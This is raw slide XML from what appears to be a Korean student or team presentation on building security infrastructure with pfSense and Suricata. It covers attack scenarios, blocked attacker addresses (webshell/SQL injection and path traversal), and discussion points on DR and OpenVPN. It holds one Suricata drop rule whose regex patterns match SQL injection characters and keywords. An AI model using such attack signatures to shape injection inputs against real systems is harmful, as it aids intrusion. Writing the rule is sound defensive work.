                  </a:txBody>
                  <a:tcPr marL="71883" marR="71883" marT="47922" marB="4792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drop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tcp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 $EXTERNAL_NET any -&gt; $HTTP_SERVERS 80 (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msg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:"[Universal] SQL Injection Pattern Detected";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flow:established,to_server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pcre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:"/(\%27)|(\')|(\-\-)|(\#)|(\/\*)/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";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pcre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:"/(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select|union|insert|update|delete|drop|into|load_file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)/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";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http_uri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classtype:web-application-attack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 panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>; sid:2000003; rev:1;)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71883" marR="71883" marT="47922" marB="4792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25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27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0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3" y="5190875"/>
            <a:ext cx="5900587" cy="1220085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4"/>
          <a:srcRect l="-840" r="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch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38130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시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3000" b="1" kern="0" spc="-75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대응방안</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38130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300" dirty="0" err="1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pfsense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="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1300" dirty="0" err="1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surcata</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="94A3B8"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR"/>
              <a:cs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13" y="3612139"/>
            <a:ext cx="5900587" cy="15027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3668" t="37350" r="3445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="219074" y="1472139"/>
            <a:ext cx="5876926" cy="204893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rcRect l="73220" t="84079" r="9317" b="9223"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7182802" y="1539389"/>
            <a:ext cx="3546564" cy="703198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7182802" y="1539389"/>
            <a:ext cx="3546564" cy="7031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657725" y="2481540"/>
            <a:ext cx="1057275" cy="2344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6" name="직선 연결선 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5715000" y="1539389"/>
            <a:ext cx="1452563" cy="94215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14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5715000" y="2243049"/>
            <a:ext cx="1466850" cy="4729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7182802" y="2995313"/>
            <a:ext cx="2867023" cy="7031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743450" y="4539812"/>
            <a:ext cx="1057275" cy="2344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49" name="직선 연결선 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5800725" y="2995313"/>
            <a:ext cx="1381125" cy="14982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14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5800725" y="3698511"/>
            <a:ext cx="1366838" cy="107573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181850" y="4539812"/>
            <a:ext cx="2752725" cy="7031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60" name="직선 연결선 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="69" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6053139" y="4539812"/>
            <a:ext cx="1128711" cy="16022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14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6138864" y="5243010"/>
            <a:ext cx="1042986" cy="102482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4995864" y="6024827"/>
            <a:ext cx="1057275" cy="2344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/>
          <a:srcRect l="77239" t="60071" r="4035" b="22816"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7197087" y="3017748"/>
            <a:ext cx="2852738" cy="66400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3"/>
          <a:srcRect l="82373" t="67106" r="723" b="12596"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7196137" y="4550860"/>
            <a:ext cx="2738438" cy="67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04"/>
            <a:ext cx="12192000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" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="1353312"/>
            <a:ext cx="11430000" cy="9144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rcRect l="-840" r="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10111435" y="1042416"/>
            <a:ext cx="152705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0340035" y="1013155"/>
            <a:ext cx="1576426" cy="19111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Infrastructure Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="390449"/>
            <a:ext cx="8810321" cy="5532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공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격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" spc="-75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시나리오</a:t>
            </a:r>
            <a:r>
              <a:rPr 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ko-KR" altLang="en-US" sz="3000" b="1" kern="0" spc="-75" dirty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대응방안</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="952805"/>
            <a:ext cx="4717390" cy="25786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en-US" altLang="ko-KR" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="94A3B8"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR"/>
              <a:cs typeface="Noto Sans K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7" y="1620317"/>
            <a:ext cx="11345858" cy="2553056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB07526-6CBB-B669-9591-23F3FAFFB279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285380" y="4173373"/>
            <a:ext cx="11344645" cy="2523592"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 268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635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D8D18311-F39B-EE4F-40E7-4B70A6CABC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80" r="-80"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537093" y="4412813"/>
            <a:ext cx="286207" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537093" y="4727367"/>
            <a:ext cx="3380016" cy="207985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endParaRPr lang="ko-KR" altLang="en-US" sz="1500" dirty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18" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024843" y="4412813"/>
            <a:ext cx="10786462" cy="198798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차단된 공격자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty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en-US" altLang="ko-KR" sz="15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: 172.16.0.17, 172.16.0.180</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty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en-US" altLang="ko-KR" sz="15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172.16.0.17: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty="0" err="1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webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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en-US" altLang="ko-KR" sz="1500" b="1" dirty="0" err="1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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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탐지에 의한 차단</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty="0" smtClean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endParaRPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty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en-US" altLang="ko-KR" sz="15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172.16.0.180: path traversal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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시도 탐지에 의한 차단</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty="0" smtClean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endParaRPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty="0" smtClean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l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>공격자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty="0" err="1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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" b="1" dirty="0" smtClean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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>들의 접속을 완전히 차단함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR"/>
              <a:cs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9548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-952805" y="-952805"/>
            <a:ext cx="5715000" cy="5715000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE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7905902" y="3524098"/>
            <a:ext cx="4762195" cy="4762195"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3B82F6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0" y="685800"/>
            <a:ext cx="12191695" cy="9144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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0" y="2057400"/>
            <a:ext cx="12191695" cy="9144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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0" y="3429000"/>
            <a:ext cx="12191695" cy="9144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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0" y="4800600"/>
            <a:ext cx="12191695" cy="9144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6172200"/>
            <a:ext cx="12191695" cy="9144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218895" y="0"/>
            <a:ext cx="9144" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="0"/>
            <a:ext cx="9144" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096305" y="0"/>
            <a:ext cx="9144" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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8534095" y="0"/>
            <a:ext cx="9144" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="9144" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="334155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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761695" y="2866644"/>
            <a:ext cx="6553505" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="22D3EE"/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8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경청해 주셔서 감사합니다.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18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프로젝트에 대해 궁금하신 점을 질문해 주세요.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761695" y="4315054"/>
            <a:ext cx="2790749" cy="1238098"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6817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rcRect l="-9880" r="-9880"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="961949" y="4552798"/>
            <a:ext cx="228600" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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rcRect l="-24850" r="-24850"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="961949" y="4858207"/>
            <a:ext cx="228600" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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rcRect l="-27265" r="-27265"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="961949" y="5162702"/>
            <a:ext cx="228600" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="4515307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보안 인프라 구축 팀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="4819802"/>
            <a:ext cx="21625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team_security@project.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="5124298"/>
            <a:ext cx="1877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github.com/project-repo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761695" y="886054"/>
            <a:ext cx="2343607" cy="221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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959559" y="886054"/>
            <a:ext cx="2324405" cy="221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0" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22D3E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&amp;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3138221" y="886054"/>
            <a:ext cx="2153412" cy="221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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7144207" y="1047902"/>
            <a:ext cx="4286707" cy="4762195"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 948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  <a:effectLst>
            <a:outerShdw blurRad="241300" dist="1905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7" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715146" y="961949"/>
            <a:ext cx="1143000" cy="190195"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 96154"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="38BDF8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8" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="1781251"/>
            <a:ext cx="3696005" cy="19202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9" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="1343254"/>
            <a:ext cx="179131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Discussion Points</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/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6"/>
          <a:srcRect l="-133" r="-133"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10963656" y="1371600"/>
            <a:ext cx="171907" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="2104949"/>
            <a:ext cx="75895" cy="75895"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="2286914"/>
            <a:ext cx="3467405" cy="9144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3" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="2029054"/>
            <a:ext cx="2338121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백업 및 재해 복구(DR) 시나리오 상세</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="2521915"/>
            <a:ext cx="75895" cy="75895"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="2703881"/>
            <a:ext cx="3467405" cy="9144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30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="2446020"/>
            <a:ext cx="2595067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Suricata 오탐(False Positive) 튜닝 과정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="2939796"/>
            <a:ext cx="75895" cy="75895"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3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8" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="3120847"/>
            <a:ext cx="3467405" cy="9144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9" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="2862986"/>
            <a:ext cx="1842516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AWS OpenVPN 이중화 방안</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="3356762"/>
            <a:ext cx="75895" cy="75895"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="47556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Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="3518611"/>
            <a:ext cx="3467405" cy="9144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2" name="Text 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="3279953"/>
            <a:ext cx="58338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i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Memo...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="3750869"/>
            <a:ext cx="75895" cy="75895"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="47556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Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="3894430"/>
            <a:ext cx="3467405" cy="9144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5" name="Shape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="4132174"/>
            <a:ext cx="75895" cy="75895"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="47556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6" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="4274820"/>
            <a:ext cx="3467405" cy="9144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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438644" y="4512564"/>
            <a:ext cx="75895" cy="75895"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="47556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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667244" y="4656125"/>
            <a:ext cx="3467405" cy="9144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9" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect t="-54" b="-54"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10696651" y="5000854"/>
            <a:ext cx="533095" cy="6099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71500" y="381305"/>
            <a:ext cx="761695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Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1037844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네트워크 흐름 제어 및 외부 서비스 연결 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="523951"/>
            <a:ext cx="5353812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pfSense-1 라우팅 · NAT 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정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="116" name="그룹 115"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214970" y="1923898"/>
            <a:ext cx="3534156" cy="2770022"/>
            <a:chOff x="8214970" y="1923898"/>
            <a:chExt cx="3534156" cy="3186582"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Shape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8214970" y="1923898"/>
              <a:ext cx="3534156" cy="3186582"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1744"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="94A3B8">
                  <a:alpha val="1000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1" name="Shape 84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8214970" y="1933956"/>
              <a:ext cx="3514954" cy="38405"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F97316"/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2" name="Shape 85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8214970" y="2658161"/>
              <a:ext cx="3514954" cy="9144"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln/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3" name="Shape 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8405165" y="2064912"/>
              <a:ext cx="381305" cy="461380"/>
